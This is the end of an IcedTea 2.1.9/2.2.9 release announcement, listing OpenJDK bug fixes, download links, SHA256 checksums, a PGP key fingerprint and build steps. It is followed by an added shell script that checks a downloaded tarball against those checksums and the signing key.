S7124347: [macosx] java.lang.InternalError: not implemented yet on call Graphics2D.drawRenderedImage
S7142091: [macosx] RFE: Refactoring of peer initialization/disposing
S7142596: RMI JPRT tests are failing
S7150345: [macosx] Can’t type into applets
S7151434, RH969884: java -jar -XX crashes java launcher
S7156191: [macosx] Can’t type into applet demos in Pivot
S7156194: [macosx] Can’t type non-ASCII characters into applets
S7171223: Building ExtensionSubtables.cpp should use -fno-strict-aliasing
S7174718: [macosx] Regression in 7u6 b12: PopupFactory leaks DefaultFrames.
S7188114: (launcher) need an alternate command line parser for Windows
S7195301: XML Signature DOM implementation should not use instanceof to determine type of Node
S7198570: (tz) Support tzdata2012f
S7199143: RFE: OCSP revocation checker should provide possibility to specify connection timeout
S8001161: mac: EmbeddedFrame doesn’t become active window
S8002070: Remove the stack search for a resource bundle for Logger to use
S8002225: (tz) Support tzdata2012i
S8005932: Java 7 on mac os x only provides text clipboard formats
S8006120: Provide “Server JRE” for 7u train
S8006417: JComboBox.showPopup(), hidePopup() fails in JRE 1.7 on OS X
S8006536: [launcher] removes trailing slashes on arguments
S8009165: Fix for 8006435 needs revision
S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03
S8009463: Regression test test\java\lang\Runtime\exec\ArgWithSpaceAndFinalBackslash.java failing.
S8009610: Blacklist certificate used with malware.
S8009987: (tz) Support tzdata2013b
S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail
S8010009: [macosx] Unable type into online word games on MacOSX
S8010118: Annotate jdk caller sensitive methods with @sun.reflect.CallerSensitive
S8010213: Some api/javax_net/SocketFactory tests fail in 7u25 nightly build
S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod
S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance
S8010939: Deadlock in LogManager
S8011139: (reflect) Revise checking in getEnclosingClass
S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows
S8011313: OCSP timeout set to wrong value if com.sun.security.ocsp.timeout not defined
S8011557: Improve reflection utility classes
S8011806: 7u25-b05 hotspot fastdebug build failure
S8011990: TEST_BUG: java/util/logging/bundlesearch/ResourceBundleSearchTest.java fails on Windows
S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05
S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris
S8012243: about 30% regression on specjvm2008.serial on 7u25 comparing 7u21
S8012330: [macosx] Sometimes the applet showing the modal dialog itself loses the ability to gain focus
S8012453: (process) Runtime.exec(String) fails if command contains spaces [win]
S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer
S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07
S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext()
S8013228: Create new system properties to control allowable OCSP clock skew and CRL connection timeout
S8013380: Removal of stack walk to find resource bundle breaks Glassfish startup
S8014205: Most of the Swing dialogs are blank on one win7 MUI
S8014423: [macosx] The scrollbar’s block increment performs incorrectly
S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09
S8014618, RH962568: Need to strip leading zeros in TlsPremasterSecret of DHKeyAgreement
S8014676: Java debugger may fail to run
S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10
S8014745: Provide a switch to allow stack walk search of resource bundle
S8014968: OCSP and CRL connection timeout is set to four hours by default

The tarballs can be downloaded from:
http://icedtea.classpath.org/download/source/icedtea-2.1.9.tar.gz
http://icedtea.classpath.org/download/source/icedtea-2.2.9.tar.gz

SHA256 checksums:
978bd734103ac3a81476d31801ff9ddc007b4b30bccf13ce83af5f4a5e17604d icedtea-2.1.9.tar.gz
e56dbcc3fe783535881aca893ce5cd20e73d9c0f159811b98233042843af756a icedtea-2.2.9.tar.gz

The tarballs are accompanied by a digital signature available at:
http://icedtea.classpath.org/download/source/icedtea-2.1.9.tar.gz.sig
http://icedtea.classpath.org/download/source/icedtea-2.2.9.tar.gz.sig
respectively. This is produced using my public key. See details below.

PGP Key: 248BDC07 (https://keys.indymedia.org/)
Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07

The following people helped with these releases:
Andreas Schwab (PR1378 patch for AArch64 Zero support)
Andrew Hughes (all other bug fixes, application of security fixes & backports, release management)
Xerxes Rånby (PR1188 ARM fix for 2.1.9)

We would also like to thank the bug reporters and testers!

To get started:
$ tar xzf icedtea-${ver}.tar.gz
$ mkdir icedtea-build
$ cd icedtea-build
$ ../icedtea-${ver}/configure
$ make

where ${ver} is the version used.
Full build requirements and instructions are available in the INSTALL file.

Happy hacking!
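Checking a downloaded tarball against the SHA256 checksum and signing-key fingerprint published in the announcement above, as an added example (not part of the original post or of IcedTea's own tooling). It assumes GNU `sha256sum` and `gpg` are installed and the signing key is already in the local keyring; the function names are illustrative.

```shell
#!/bin/sh
# Added example: verify an IcedTea source tarball before unpacking it.

# Values copied from the announcement (fingerprint with spaces removed).
SHA256_2_1_9=978bd734103ac3a81476d31801ff9ddc007b4b30bccf13ce83af5f4a5e17604d
SHA256_2_2_9=e56dbcc3fe783535881aca893ce5cd20e73d9c0f159811b98233042843af756a
SIGNER_FPR=EC5A1F5EC0AD1D158F1F8F913B96A578248BDC07

# sha256_matches FILE EXPECTED_HEX
# Succeeds only if FILE is readable and its digest equals EXPECTED_HEX.
sha256_matches() {
    actual=$(sha256sum "$1" 2>/dev/null | awk '{print $1}')
    [ -n "$actual" ] && [ "$actual" = "$2" ]
}

# signed_by FINGERPRINT
# Reads `gpg --status-fd` lines on stdin. Succeeds only if a VALIDSIG line
# names FINGERPRINT as the signing key (field 3) or as the primary key
# (last field). BADSIG, ERRSIG or no output at all means failure.
signed_by() {
    awk -v want="$1" '
        $1 == "[GNUPG:]" && $2 == "VALIDSIG" && ($3 == want || $NF == want) { ok = 1 }
        END { exit !ok }'
}

# verify_release TARBALL EXPECTED_SHA256
# Expects TARBALL.sig next to TARBALL. The full 40-digit fingerprint is
# compared because the 8-digit key ID (248BDC07) is only its tail and is
# too short to identify a key reliably.
verify_release() {
    sha256_matches "$1" "$2" || { echo "checksum mismatch: $1" >&2; return 1; }
    gpg --status-fd 1 --verify "$1.sig" "$1" 2>/dev/null | signed_by "$SIGNER_FPR" ||
        { echo "no valid signature from $SIGNER_FPR: $1" >&2; return 1; }
    echo "OK: $1"
}

# Usage, with the tarball and its .sig in the current directory:
#   verify_release icedtea-2.2.9.tar.gz "$SHA256_2_2_9"
```

The checksum and the signature answer different questions: the checksum only shows the download matches what the announcement lists, while the signature ties the file to the holder of the announced key.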